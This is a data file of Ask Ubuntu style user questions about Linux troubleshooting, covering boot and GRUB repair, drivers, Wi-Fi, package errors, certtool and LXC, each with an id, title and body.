400130	is it possible to invoke certtool to create a self signed certificate using a pkcs # 8 key and a template file ?	i 'm struggling with certtool from the gnutls package on ubuntu server 12.04.3 . i 'm trying to follow this guide but with an encrypted key . i 've created my encrypted private key like so . # certtool \ > -- generate-privkey \ > -- pkcs8 \ > -- sec-param low \ > -- pkcs-cipher aes-256 \ > -- outfile ca_key.pkcs8 generating a 1248 bit rsa private key ... enter password : confirm password : now i would like to create a self signed certificate using this key with the following command . instead of prompting me for the password for the private key though , i get the following error . # certtool \ > -- generate-self-signed \ > -- load-privkey ca_key.pkcs8 \ > -- pkcs8 \ > -- pkcs-cipher aes-256 \ > -- template ca_template generating a self signed certificate ... segmentation fault ( core dumped ) if i attempt this with the same template and an unencrypted private key it works . or if i use the encrypted key without a template , it also works . # certtool -- generate-privkey -- sec-param low -- outfile ca_key generating a 1248 bit rsa private key ... # certtool -- generate-self-signed -- load-privkey ca_key -- template ca_template generating a self signed certificate ... x.509 certificate information : version : 3 ... # certtool -- generate-self-signed -- load-privkey ca_key.pkcs8 -- pkcs8 -- pkcs-cipher aes-256 generating a self signed certificate ... enter password : please enter the details of the certificate 's distinguished name . just press enter to ignore a field . country name ( 2 chars ) : gb ... is there a way to make certtool accept both a template file and an encrypted private key ? or do i need to script the decryption of the private key to a temporary key file to pass to certtool ?
400131	partitions recover after xenserver installation	i just tried to install xenserver . have chosen my usb drive to install , but somehow installation has deleted all my partitions with ubuntu and so on . my previous installation with ubuntu was in the center of hdd and i think it is still possible to recover files . the first part of disk was just for some temporary info , games and not so important information and i think this could not be recovered because of new installation of xen server . i need help because acronis do n't work with ez drive and i do n't know any other methods of recovering partition and files .
400138	install / dual-boot ubuntu on a android tablet ?	i have a samsung galaxy tab 3 7.0 ( sm-t210 ) , i would love to install ubuntu on it . is it currently possible ? and is anyone developing a rom ?
400139	do drivers work if i install them on windows ?	sorry if it sounds very , very stupid , but after changing touchpad settings with i do n't remember which program , they did n't dissapeared after reinstalling different partitions and operation systems . if i install video card drivers on windows 7 and then boot into ubuntu ( whatever , linux : d ) do it works ? for an example , wine ? do it uses it ? works better after driver update or not ?
400141	issues with dualbooting after installing windows 8 ( boot-repair not working ! )	i used to dual boot ubuntu and windows 7 before i decided to format my windows partition and install windows 8 instead . as always , my grub went missing ( only windows loading ) and i run boot-repair-disk from usb . however , the recommended repair fails with the message : you have installed on sda5 a linux version which is not efi-compatible . it is probably incompatible with your computer . please install an efi-compatible system . for example , linux-secure-remix-64bit and ubuntu-64bit are efi-compatible systems . so it turns out that my newly installed windows is 64-bit and with efi while my installed ubuntu is not efi compatible ( so it must be 32-bit ? ) . after reading around , it seems that this is actually the kind of thing that boot-repair should solve by default , yet i get that message . i could n't really find any posts with the same problem so i 'm stuck . i was thinking of reinstalling ubuntu with a 64-bit version as suggested by the message but i would have to back up data from my home folder first which seems to be not doable at the moment ( i stupidly encrypted that partition some time ago and do not a key ... ) . this is the log generated by boot-repair . http : //paste.ubuntu.com/6692233/ please help !
400142	i can not install my printer	hello i just started to use ubuntu . for the moment i have not a very good impression . i still try to install my printer and it seems that i need a password for `` workgroup '' . can you please let me know how to proceed ? i really need the printer . thank you , viorel
400143	how can i stop document viewer from always opening full-screen ?	every time i open a pdf , document viewer takes up the whole screen and then i press f11 , ctrl+super+up to maximize it instead . this is tedious . how can i stop it from automatically entering full-screen mode ?
400145	wifi not connecting	installed ubuntu 12.04 lts on 7.7 gib intel core i7 64-bit . upon installation , my home wifi was available and able to connect . upon completion of installation : `` enable networking '' checked , yet no listed networks . went to edit connections . wireless tab . name : linksys , last used : never . went to terminal . nm-tool networkmanager tool state : disconnected - device : **** -- -- -- -- -- -- type : wired driver : r81** state : unavailable default : no hw address : ** : ** : ** : ** : ** : ** capabilities : carrier detect : yes wired properties carrier : off i have literally no clue what to do . on another forum i saw a person used nm-tool and some other networking jazz . so i thought i 'd print nm-tool , it seemed the most important . but , if you 'd like to troubleshoot more i 'd be happy to comply .
400149	ubuntu 13.10 some errors after update	ubuntu has been updated recently and my computer has experimented some problems . lightdm now is white and sometimes appears a message saying that is running on low graphics mode . some installed applications return an error saying that another instance is already running . other ones do n't have permissions to edit documents . p.d . i have added the image of the lightdm .
400150	how to resolve `` the harddisk seems too small '' with testdisk deeper search	i need to recover the ntfs partition that was removed by ubuntu 13.10 installation after choosing `` replace ubuntu 12.04 with 13.10 '' but i am getting this message disk /dev/sda - 640 gb / 596 gib - chs 77825 255 63 the harddisk ( 640 gb / 596 gib ) seems too small ! ( < 3600 gb / 3353 gib ) check the harddisk size : hd jumpers settings , bios detection ... the following partitions ca n't be recovered : partition start end size in sectors linux 38408 16 9 115518 41 43 1238773760 linux 38409 183 47 115519 209 18 1238773760 > linux 38410 123 50 115520 149 21 1238773760 linux 38411 226 24 115521 251 58 1238773760 hpfs - ntfs 77824 254 63 141865 254 62 1028818665 fat16 < 32m 236896 174 39 437737 24 62 3226501239 there are many other places with people asking this but they all are specific cases .
400152	how to copy and paste a file	i want copy and paste a file name of the file is mkoctfile.m and is currently in this path /usr/share/octave/3.2.4/m/miscellaneous/mkoctfile.m i want to paste it in the following path /usr/bin/mkoctfile-3.2.4 i have made the directory by using following commands sudo su mkdir -p /usr/bin/mkoctfile-3.2.4 but i dont know how to copy and paste mkoctfile.m in this path please tell me what command i have to use thanks
400153	package other than calibre for converting an rss feed 's entries to an ebook	is there a package in the repositories ( other than calibre ) that could be used to take an rss feed and convert the entries into an ebook for reading ? calibre seems a bit too bulky to use to simply grab a single feed and spit out the entries as perhaps an epub . calibre has a manual section for grabbing rss feeds but i am not too keen on fiddling with python .
400154	computer stalls when wireless activated	i have an old , slow laptop that runs xp and am trying to salvage it with linux . i 'm using the ubuntu 13.04 disk that came with linux starter kit , running it as a live disk on my toshiba satellite a105-s4084 . it worked fine until i activated the wireless network . internet worked very fast , then computer stalls until i hit control-alt-delete . then all the commands i 'd hit activated and it ran until it stalled again . this was continuous , stall , ctrl-alt-del , run , stall ... .until i gave up and shut the computer down . is this because i 'm running a live disk or is ubuntu unsuited to my machine ? i have 2.49 gb of ram on the computer .
400157	mysql installation fails on completely new installation of ubuntu	i 'm rebuilding my vm for the second time today . this is getting ridiculous . mysql keeps failing to install : i 've read elsewhere ( mysql keeps failing to install ) that if you do n't specify a password it 'll work . i 'm about to try it , but what about securing my mysql installation ? or does it default to my root password ?
400162	ubuntu installation from windows	i have downloaded ubuntu desktop from the ubuntu website and name of the file is `` ubuntu-12.04.3-desktop-i386.iso '' as i am running from an intel machine . that iso file i have mounted using power iso and now i am trying to install from it using .exe file for ubuntu installer . still i am getting an error can not download the metalink and therefore the iso . if once i have already downloaded iso , why would i need to download it again . please someone help me to solve this . i have got something more . if anyone can help me with this ... ... this time ubuntu installer tried to download the file ubuntu-12.04.3-desktop-amd64.iso why this file on an intel machine
400167	old systems..and my clients	i have some 500+ installs of lubuntu and xubuntu on processors from pentium ii ( 400 mgh ) to amd ( 1 gh p. iii equiv . ) and i need to know if 14.04 will run in place of 12.04 . most will not cleanly load 13.10 .
400168	updating to ubuntu 13.10 with ati radeon graphics card	the question will seem repeated at first , but let me explain why it is not . i have an hp pavilion dv6 , with an intel centrino 2 processor , ari radeon graphics card . so i recently updated my 64-bit ubuntu 13.04 to 13.10 . i was welcomed by a black screen . i followed answers to other questions on askubuntu , now it starts by showing '' your screen , graphics card , and input device settings could not be detected correctly.you will need to configure these yourself . '' i tried downloading a new driver from ati.com like http : //www2.ati.com/drivers/beta/amd-catalyst-13.11-beta-v9.4-linux-x86.x86_64.run.zip , for some reason the extraction always fails . failsafex never actually does anything , it prints a single line then halts . i tried reinstalling fglrx , ubuntu-desktop , gdm and a lot more packages.. basically i tried all the approaches mentioned here how to fix `` the system is running in low-graphics mode '' error ? but none worked i have no clue what to do now , i do n't want to reinstall ubuntu to avoid many software reinstallations and configuration .
400173	ubuntu 12.04 automatically boots , no grub menu	i have a dell inspirion 531 running windows 7 and i installed ubuntu in a dual boot side-by-side setup , but it boots directly into ubuntu 12.04 . i have run the ubuntu boot repair disk , but with no success . there is one message before ubuntu loads . kvm not accessible ( or something like that ) . the boot repair run is at : http : //paste.ubuntu.com/6692977/ thanks for your help , eric
400177	ubuntu 12.04 wo n't install on windows 8	i 've tried almost all the tutorials . i 've researched for a very long time ( probably missed something ) . i would really appreciate some help . i have a toshiba satellite with windows 8 pre-installed . i installed ubuntu 12.04 and used unetbootin to burn it to my usb . i disabled `` secure boot '' from the uefi . i changed the settings in the uefi to make the usb boot first . i 'll get to the screen where it gives me the option to : 1 . try ubuntu without installing . 2 . intall ubuntu . 3 . check the disc for errors . if i select either option 1 or 2 , i get a blank screen and my computer just sits there and runs . nothing happens . i have a feeling this has something to do with either the graphics card on the computer or the uefi screwing me over . i do n't think it will allow me to do `` nomodeset '' or anything like that . i 've checked the md5 sum and it 's correct . what should i do ?
400178	how can i reset document viewer 's per-document settings ?	document viewer appears to remember my settings ( scroll position , zoom , full-screen , etc . ) for each document . i 've recently changed its default settings and i want them to apply to all documents , including those i 've opened previously . how can i make it forget all per-document settings without reverting the changes i 've made to the default settings ?
400180	ubuntu 13.10 network connectivity issues	i recently switched to ubuntu 13.10 , and i have a few bugs . i ca n't connect to networks anymore through wifi anymore ! i can still connect to ethernet , but thats it . i used to be able to connect to my home wifi , but recently , that stopped working too . does it have anything to do with me dual-booting my computer with windows 7 ? is there any way to fix it ? i tried everything i could do to fix it , and i spent many hours looking for other ways .
400181	upgrading gtx 560 to gtx 580 in ubuntu 12.04	i am fairly new to ubuntu , i am currently running ubuntu 12.04 . i am upgrading my current gtx 560 ( current driver 304.117 ) to a gtx 580 . my question is what should i do to get the latest drivers for my new 580 , and what steps should i take before installing the video card ? so that the transition is smooth .
400182	script that will reboot pc on specific gpu temp	recently i 've started mining litecoins . my miner consists of 3 radeon r9 290x gpus . from time to time one of them ( not a specific one , it happens randomly ) stops mining . usually restarting cgminer ( mining program ) does n't help , the only thing that helps is reboot . next week i 'm leaving for 8 days and i have nobody to do that for me so i thought of a script that would do that automatically . the script would have to periodically verify if all gpus are working and if not - reboot . i think temperature reading is the easiest thing to determine if all cards are working . i know how to read temperature , reboot , add stuff to cron . what i do n't is how to put it all together . get temperature command : aticonfig -- odgt -- adapter=all | grep sensor : output looks like this : sensor : temperature - 77.00 c sensor : temperature - 77.00 c sensor : temperature - 77.00 c i would like the script to read the numerical value and reboot if it drops below xx . can you please help me out ?
400185	where can i find a precompiled verson of the mesa 3d library ?	i 'm pretty new to the ubuntu community and i was wondering what where i could find precompiled versions of the mesa 's librarys . i keep following instructions and i keep trouble shooting but i can never seem to compile it , regardless of what i do . so that why i was wondering , is there a place or a person who could give me the precompiled version of the mesa 3d librarys ? preferably 9.5+ because dota 2 looks like an array of health bars and shadows without it . thanks in advance , david .
400187	openerp not allowing other things to be installed	i have an openerp server set up for testing purposes on my computer . since the setup , whenever i try to install other applications i get an error caused by openerp , when trying to install packages like sudo apt-get install patch i get this setting up openerp ( 7.0-20131230-002457-1 ) ... chown : can not access ‘/etc/openerp/openerp-server.conf’ : no such file or directory dpkg : error processing openerp ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : openerp e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this error seems to occur everytime i try to install third party libraries . john @ heisenberg : / $ sudo apt-get install libboost-all-dev reading package lists ... done building dependency tree reading state information ... done libboost-all-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 7 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up openerp ( 7.0-20131230-002457-1 ) ... chown : can not access ‘/etc/openerp/openerp-server.conf’ : no such file or directory dpkg : error processing openerp ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : openerp e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any idea what i can do to resolve this issue ? i ran sudo dpkg -l | grep -v ^ii and this is what i got | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-=========================================-=======================================-============-================================================================================================ if openerp 7.0-20131230-002457-1 all openerp enterprise resource management rc unity-webapps-grooveshark 2.4.16+13.10.20130924.2-0ubuntu1 all unity webapp for grooveshark rc vnstat 1.11-2 amd64 console-based network traffic monitor thanks !
400189	screen flickering in ubuntu 13.10	i 'm running an : acer aspire m3610 intel dual core 2160 1.8 ghz ( 1200 mhz ) ati rs600 ( radeon xpres 1250 ) the problem is : ocasionally the screen flickers when using mozilla firefox the screen flicker ever too much when watching youtube videos . dash do n't shows the colors correctly and shows a blurry image . i think i have installed the common , bad and ugly , gstreamer codecs , but maybe there are some others that i have to install . there are too many of them . could it be a flash plug-in problem , gstreamer problem , ati controlers ... or what ? .
400191	issues installing ubuntu 13.04 alongside windows 8	i have windows 8 on my lenovo z500 laptop . i installed ubuntu 13.04 alongside windows and after that i restarted my laptop . however , grub does n't show so i can chose my operating system . i ran grub-repair and tested it and said : successful repair but nothing changed after that . i used easybcd , but when i choose ubuntu it goes to the command mode that has just this : grub > after that i wanted to reinstall ubuntu , but it says you have two operating system on your laptop but when i use a gparted command to see my partitions it just show my 3 partitions that i have on windows in the ntfs format . if i go to this path in windows manage > diskmanagement i have a 77gb unallocated partition , but it doesnt show on ubuntu live cd under gparted command as a ext4 or ext3 partition . how can i solve this problem ? i have tried both legacy and uefi boot mode but nothing changes !
400194	why is the ubuntu desktop download a zip instead of an iso ?	i have tried downloading ubuntu desktop four times and it is downloading as a zip file instead of an iso file . when i open it it opens in my archive program . hence i can not mount it to disk and install it onto my computer . what can i do ?
400196	darktable ca n't startup	during darktable startup from console i get : nnnn @ nn : ~ $ darktable darktable : symbol lookup error : /usr/lib/x86_64-linux-gnu/libcolordprivate.so.1 : undefined symbol : cmsgetheadercreator i tried to reinstall : colord , libcolord1 , darktable , but to no avail ( the same error ) . some hours ago , i managed to successfully run darktable , but after a short time , darktable ended unexpectedly without any error message or crash report . it is the first time that i have tried to use darktable since dist upgrade from 13.04 to 13.10 . can anybody provide me with a useful solution ? ( google return only 2 sites with that error phrase . )
400198	permission problem with sftp in filezilla	recently , we installed ubuntu server on our servers this is very new for us . however , we tried to setup a apache2 server which did work . but the problem is that we ca n't configure apache and other configure files due the lack of permissions . i found a command for some days ago and gave myself access to `` /var/www '' . but that 's the only folder i got permissions to . i forgot what the command was and i ca n't use root because i do n't know the password . i ca n't remember if i tried to setup any . i am the only user on the machine so i got admin permissions but need root . so what i need help with is to give myself access to the whole server . mostly `` /etc/apache2 '' but the whole server would be better . anyways , how do i give myself permissions for this and how do i enable root ? all sudo commands tells me this `` sudo : must be setuid root '' .
400199	need help installing ubuntu over slackware	my biggest problem is we got a new computer from a friend after ours died . this computer runs slack-ware and we have no clue what we are doing . we have looked up how to install programs but it seems we do n't have the root password ( he said he set all passwords to the same thing ) . so i have downloaded ubuntu and the pendrivelinux universal installer , but i ca n't get it to run and load onto flash drive so i can switch to ubuntu ( which i have some experience with ) . we only have this one computer at the moment and if this goes sideways , we are totally screwed , as we ca n't look up the problem and fix it . we now have a dell inspiron 1525 - no idea what it has inside ( ca n't figure out how to see it ) . on boot up it has huge and slackware as choices . any help or advice would be greatly appreciated . thanks
400204	usb mouse/keyboard stopped working ubuntu 12.04 lts 32 bit	i have logitech easy call desktop set . ( http : //www.logitech.com/en-us/support/136 ) i 've recently changed my graphic card from nvidia to ati this usb set stopped working in ubuntu 12.04 after that.. i think it 's not a hardware problem because i have dual-boot , and it works perfectly in windows 7 . if i run lsusb the devices seem to be connected . if i connect an extra mouse to any usb port it does n't work . any ideas ?
400208	how to run a script each time i login and unlock session	in saucy salamander i need to run a script each time i login then each time i unlock the session after manual lock or auto sleep . i ca n't use `` startup application '' for that because it would n't trigger on unlock .
400210	how to correctly restore system from tar backup ?	ok , so i decided to make a backup of my ubuntu 13.04 system using tar . i was following guide here and i made a backup of my ubuntu installation . now , what i do n't understand , is how to restore from this backup . should i just untar this file to newly created partition and repair grub ? because that did n't work . by the way for grub repair i used boot-repair . the thing about restoration is not explained well in the guide in my opinion . i also found some alternatives like clonezilla and remastersys which is n't supported anymore , alternative for that is relinux , but i really find this tar backup satisfying , just restoration is something still unexplained to me . can you please tell how to restore ?
400214	problem with nautilus on sdb1 for system drive in devices sidebar after manual mounting usb drive	a few days ago i had to format a usb drive to install a windows os on a computer . i followed a walk-through that i had found windows 7 boot disk the walk-through worked but i used part of another as it would not remount after i pulled it and put it back in . i used a remount command for sdc1 after this happened i went in and formated the disk . it worked . i than noticed in nautilus that my system drive had vanished i have tried most of the walk-through when i go to explorer it shows in the computer tab but wont open when i hit properties it shows the uuid but it says nothing of the size and lists no volume info . i have tried to manually load it to media but it wont even through the maintenance terminal . can anyone help me ?
400215	find and install older kernel	i have been runnig 12.04 lts untill now , and it have been working fine with the backported 3.8-kernel . later i have replaced it with 13.10 saucy , with the 3.11-kernel . since then i face craches after a few days up-time . the screen goes black and nothing i can do gives me the picture back . i hade the same problem when i tried the backported saucy-kernel for lts . therefore i blame the kernel , and that is the reason to this question . i have been looking at the archive here , but it is a mess . seems to be only obsolete or mainline kernels . http : //kernel.ubuntu.com/~kernel-ppa/mainline/ is there a way to find the latest raring-kernel , 3.8.x for download ? of course i can go back to 12.04 , but i would prefeer to solve it this way if possible .
400218	after upgrade to 13.10 gnome top panel empty and nothing can be added	i have just updated ubuntu from raring ringtale to saucy salamander . i 'm using the classic desktop since many versions and it always survived the upgrade . but now my top panel is empty . it is there and expands , but there is nothing in it . aplications , places.. my launchers and the login/out , wireless.. area are all gone . for some reason it has a white line on the bottom , but otherwise it is completly empty . at the end of the upgrade i was asked if i want to keep some obsolete packages , i clicked remove . -- > do i need to add some packages again ? which ? ( can i somehow check what was removed ? ) some random information that might give clues : my bottom panel is just like before . gnome-session-flashback is installed . if i alt + rightclick it and select add to panel and add things , nothing changes , the panel remains deserted .
400220	need help setting up cgminer	i 'm new to litecoin mining and i have been following a step by step guide ( highoncoins.com ) i 've had success in installing ubuntu and all the drivers , but when i download cgminer-3.7.2-x86_64-built.tar.bz2 i follow the steps : cd downloads tar xvf cgminer-3.7.2-x86_64-built.tar.bz2 cd cgminer-3.7.2-x86_64-built but when i check to see if cgminer recognizes my cards : ./cgminer -n i get bash : ./cgminer : no such file or directory please help , i 've been stuck on this for days .
400223	ca n't install root-system-bin	im using ubuntu 13.0.4 and have tried getting updates via the command line ..no joy latest issue is trying to install root sudo apt-get install root-system-bin getting message reading package lists ... error ! e : could not open file /var/lib/dpkg/status-open ( 2 : no such file or directory ) e : the package lists or status file could not be parsed or opened . i have tried sudo rm /var/lib/apt/lists/* -vf sudo apt-get clean sudo apt-get update sudo apt-get upgrade from http : //ubuntuforums.org/showthread.php ? t=2078996 but when i get to second line i get : - e : could not open lock file /var/cache/apt/archives/lock-open ( 2 : no such file or directory ) e : unable to lock the download directory
400224	how to store lxc container 's files in another folder	well the answer seems to be given on https : //help.ubuntu.com/13.04/serverguide/lxc.html # lxc-hostsetup page under using a separate filesystem for the container store title but it does n't work for me . i have created a symlink for lxc folder pointing another folder in another partition ( like suggested in the article ) , like sudo ln -s /some/other/folder /var/lib/lxc after that when i try to create a container i get following errors : destan @ xxx : ~ $ sudo lxc-create -t ubuntu -n testing [ sudo ] password for destan : lxc-create : no config file specified , using the default config /etc/lxc/default.conf checking cache download in /var/cache/lxc/raring/rootfs-amd64 ... copy /var/cache/lxc/raring/rootfs-amd64 to /var/lib/lxc/para/rootfs ... copying rootfs to /var/lib/lxc/para/rootfs ... /usr/sbin/locale-gen : line 207 : /dev/null : permission denied /usr/sbin/locale-gen : line 208 : /dev/null : permission denied /usr/sbin/locale-gen : line 210 : /dev/null : permission denied /usr/sbin/locale-gen : line 217 : /dev/null : permission denied generating locales ... en_us.utf-8 ... done /usr/sbin/locale-gen : line 242 : /dev/null : permission denied lxc-create : failed to execute template 'ubuntu' lxc-create : aborted anybody having an idea ?
400226	no wifi after creating ad-hoc network ( diagnostic tools ? )	the other day , i made an ad-hoc wifi network for some lan gaming . after i disconnected , i tried to reconnect to the wifi network , but it kept saying it could n't connect . i disabled and re-enabled my wifi to no avail . thinking that i might get an error message , i restarted nm-applet in a terminal , but no error message came through when i tried to connect . i fiddled with a few of the network settings ; nothing helped . i restarted the system , but it still would n't connect . then i had the computer forget the network and reconnected , thinking maybe a fresh start would do the trick . still no connection . finally , fed up , i sent the computer to sleep . next day i woke up the computer and tried to connect , and it worked . now , i 'm pretty sure the problem did n't arise from bandwidth issues , because i can usually still connect to the network in those conditions . i do n't think it was a router problem , because i could access the network before setting up the wlan , and anyhow the wlan would n't change any of the existing network 's settings . this leaves me with two options : there was some sort of internal setting ( ip address , etc . ) which needed to expire to allow the old connection . if so , is there a way to manually reset this in linux ? there was a router problem . in this case , there 's nothing to do but restart the router . is there a third option i 'm missing ? also , how would i go about troubleshooting something like this ? ( as a side note , the other computer which had been connected to my network was running windows 7 , and it also could n't connect after disconnecting from my ad-hoc network . )
400227	lubuntu vm - how to make external monitor on left side of primary monitor	i am using lubuntu as a virtual machine and my host os is windows 8 and i connected an external monitor and it is to the right of my primary monitor . how do i change it so that it is to the left of my primary monitor ? i tried going to desktop settings but could n't find anything . i also went to presferences - > display settings and it said 'the following monitors are detected : ' and showed 'virtual1 ' and 'virtual2 ' and gave me the option to turn them off / on , change their resolution and refresh rate , but i am not able to pick which side the monitor appears . how do i change it so that my external monitor is on the left side of my primary monitor ?
400229	error with virtualbox , ?	04 64 bits , and i isntall virtualbox 4.3 ( latest ) and i ca n't open virtualbox because of this error : fallo al crear el objeto com de virtualbox . la aplicaci贸n se cerrar谩 . pcdata invalid char value 31 . location : '/home/youssef/.virtualbox/virtualbox.xml ' , line 14 ( 31 ) , column 70 . /home/vbox/vbox-4.3.6/src/vbox/main/src-server/virtualboximpl.cpp [ 531 ] ( nsresult virtualbox : :init ( ) ) . c贸digo resultado : ns_error_failure ( 0x80004005 ) componente : virtualbox interfaz : ivirtualbox { fafa4e17-1ee2-4905-a10e-fe7c18bf5554 } if someone can help me thanks
400230	steam install in wine not working	i know this is n't an ubuntu specific problem but i am hoping i might find some help here from the ubuntu community who may have experienced this issue before . i know its possible to run steam natively but i have recently made the complete switch to ubuntu and would like to run steam under wine so i can install and play my windows games . i am currently using crossover but had the same problem with playonlinux and manually using wine . steam installs fine and i get to the login screen , i enter my details and proceed to enter the code that you receive in an email from steam , and then it just disappears and when you open steam again you are brought back to the login screen and have to repeat the process . if anyone has any information on this it would be greatly appreciated . i hope this is not too general , i have tried this on my laptop and desktop and had the same effect . i searched online and found no information about this specific problem .
400233	fstrim is taking too long ?	i 'm running manual ssd trim fstrim -v / , and it 's added to my /etc/rc.local . recently i realized that the command is taking too long to finish execution . it finishes after i login by average 10 minutes execution . it 's trimming around 37 gb of free space . it 's annoying to feel that sdd is still busy all that time . is this normal ? i 'm running ubuntu 13.10 [ update ] the only thing that changed , is this happened among ubuntu failing to moung encrypted swap on startup . i fixed the swap problem , but fstrim still slow on startup . thanks .
400236	how to boot into a command line ? ( tty0 )	i need a little help on xubuntu 13.10 , i would like boot into the tty1 ( command line ) instead of the default login manager , i 've tried to type into the grub configuration file with changing the line « grub_cmdline_linux_default= '' quiet splash '' » by « grub_cmdline_linux_default= '' text '' » it works ! but i do n't have sound after start the x11 env . do you 've an idea ? ( i come from archlinux to xubuntu temporarily , it changes the atmosphere . ahah ) .
400240	upgraded from 13.04- > 13.10 ; `` error occurred while mounting /boot/efi ''	i upgraded to 13.10 this morning , and can no longer launch ubuntu . specifically , i 'm greeted with the following message : `` an error occurred while mounting /boot/efi ( press s to skip mounting or m for manual recovery ) '' i ran boot recovery to no avail -- the output of the report is here : http : //paste.ubuntu.com/6693898/ one potentially relevant thing i 've noticed is the following error : `` fat-fs ( sda1 ) : io charset iso8859-1 not found '' which seems similar to this bug ( https : //bugs.launchpad.net/linuxmint/+bug/1221330 ) but i 'm totally not smart enough to understand if it is or what to do if that 's the case . any help would be tremendously appreciated : (
400242	connecting my ubuntu pc to tv and getting netflix to run full screen on the tv ?	when i connect my ubuntu pc to the tv , the screen is fully mirrored on the tv but when i run netflix it only fills up about 1/4th of the screen . is there a way i can fill up the whole screen while running netflix . for clarification the whole screen is filled when browsing the internet .
400244	cant boot from usb . usb device not show up in boot options menu	i installed windows 8 on a usb so i could boot from there then install windows over ubuntu . but the usb isnt showing up on the boot menu . i used this tutorial ( how to create a windows 8 bootable usb stick with ubuntu ? ) to put it on the usb and it seemed like it worked . ive tried on this mchine and my other pc . please help !
400245	trace ip from mac	i have a virtual server running ubuntu at a hosting provider . in the last couble of month i have experienced a dramatic increase of inbound traffic . all of it being udp packets . looking in the logs i have litterary tens of thousands of lines on the form : [ ufw block ] in=eth0 out= mac=culprit_mac_addr ? src=a_lot_of_ip_addr dst=my_server_ip before the spam started i was using at most 10 gb of traffic per month , now it has increased to 200 gb per month with 99.99 % of it being inbound traffic only . i can see ufw logs mac address on the form : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx and i know that eth0 mac address is the same as the first 12 hex numbers in above address . is there any way to do a ip lookup based on the full mac address from ufw log ? i would surely like to silence whatever that is spamming my server ! even though im not even near my traffic cap . : - )
400246	where do `` random numbers '' come from in ubuntu ?	http : //arstechnica.com/security/2013/12/we- can not -trust-intel-and-vias-chip-based-crypto-freebsd-developers-say/ reveals the likelihood that cpu based random number generators `` rdrand '' and `` padlock '' have been crafted with nsa input too benefit nsa code cracking . do the current ubuntu distros utilize those routines on machines with intel and via cpus ? if so , can those generators be bypassed by installing other code ? a search on `` random number '' did not reveal either , and since privacy is important to many , i do believe this is of general interest and not an obscure issue . if the reader agrees , please vote up this question as important to you .
400250	flash / videos / archive manager	when i try to download and install flash , it asks me what version of ubuntu i 'm using . i assume it would know because i do n't . the video player wo n't let me play any of my previously windows-viewed videos and tells me i do n't have the plugins and/or an error occured . do i have to keep the ubuntu dvd in the dvd drive all the time when i want to shut down the computer and/or restart it ? the dvd drive doesnt seem to work or it isnt read/seen in ubuntu . im asking all these in one bunch because im basically stuck with ubuntu and it has deleted my windows 7 ! when i afford it im buying a new or used win 7 system .. that 's the only way to get rid of ubuntu apparently . i might even destroy this one so no one ever uses this one .
400255	mousewheel does not work in gedit	i have uninstalled overlay-scrollbar . but in gedit mouse-wheel does not work when scrolling . in other gnome and kde programs mouse-wheel works well ; it is disabled just in gedit . i open it in kde environment . what 's wrong with gedit ?
400256	can 1 setup the ext4 partition w/filesystem/swap space alongside xp home ed prior to ubuntu livecd setup using up remaining free space on hdd ?	i 'm having a difficult time with user setup of ubuntu 's extended partition ( and the logical drives contained within this ext4 partition ) using livecd . if detailed instructional url exists , kindly provide w/your reply . thank u , in advance 4 any efforts on my behalf . i do not wish to inundate anyone with redundant questions on this . i 'm a 1st time user of ubuntu but a long time end-user of windows os 's , linux 's walnut creek & red hat versions . i 've a 320 gb internal hdd ( 119.0 gb primary active/mounted for xpx86 he -ntfs ) , ( a 30 gb recovery primary partition ( mounted ) - hidden ) + ( @ 148 gb free space : unpartitioned ) . my bios are up-to-date ( have current version 2009 of oem bios - old phoenix bios ) . my machine contains 2500 gb ram ( 512 built on board + 1 dimm of 2gb ddr2 ram installed ) - my machine is a toshiba m100 series model , and so far , it ran xp & ubuntu but performance stats when i install ubuntu lts is rather slow . ubuntu attains all of the necessary hw drivers for m100 laptop - excellent compatibility . ( i was concerned that dual-booting/running xpx86 hm ed . & ubuntu 12.04 lts might be a futile venture - not at all ! ) . ubuntu 12.04 lts is very flexible , `` forgiving '' & reliable . i would only wish to resolve the partition misalignment and reserve space for an additional `` utility '' partition that would follow ubuntu 's swap partition ( one that will follow the ubuntu filesystem and swap space ) . i must be doing something unorthodox or missing an undocumented step in following through w/self-partitioning and setup of ubuntu lts . each time i attempt the `` diy '' partitioning - i somehow muck it up even when i follow exact ubuntu livecd setup . i also receive the msg . that my extended ( ext4 ) partition is misaligned by 1024 kb . i know i must sound like an inept rube but my fervor to run linux drives me on . i love what the brilliant youngsters have done with linux ( i say : no `` meh '' achievement - linux ubuntu 12.04 lts is enthralling & just loads of fun , too ! ) . post update : 01.05.2014 ( sunday ; 8:58 am - united states time : ny ) ) the conclusion : `` after the dust has settled '' , many cups of tea later , i journalized my previous setup mishaps w/ubuntu 12.04 lts livecd installation ( selecting `` do-it-yourself '' =diy= '' something else '' partition setup option instead of the old command line method from a terminal window ) . all linux partitions ( prim/ext4 file system format/actv/mntd - 68 gb ( ext4 journalizing format ) & ( 2nd partition extended partition containing logical drive 4.3 gb swap space ( linux - swap format ) are a success ! it was fortunate that i had utilized ubuntu 's disk utility and recognized there was more lacking than just the ubuntu 12.04 lts primary ext4 partition being misaligned ! the performance of my xp os is greatly improved and accelerated ( read/write/seek times ) . the 3rd party boot manager was the `` root '' of some of the alignment problems with ubuntu lts - as well . all better now ! avinash , i will always remember you were the 1st & only individual to have offered to review my problem & assist ( my 1st ubuntu posting ) . kind regards , honeybuntu . personal motto : `` compute '' responsibly ( aka : think logically = see : common sense )
400257	i need to know if my graphics card has a wddm driver	i want to switch to windows 8 and one of the requirements is a graphics card with a wddm driver . how do i find out if my graphics card has one ? i have an nvidia geforce 9500 gs .
400258	error while booting ubuntu 13.10 , `` mismatch in gmch_pfit.lvds_border_bits ''	i 'm new user of ubuntu and i just installed it using a usb stick . i did a double-boot with windows 7 and ubuntu but when i start ubuntu it shows this error : [ drm : intel_pipe_config_compare ] *error* mismatch in gmch_pfit.lvds_border_bits ( expected 32768 , found 0 ) after a few seconds it starts normally , but i do n't know what this means . i 'm using ubuntu 13.10 , how do i fix it ?
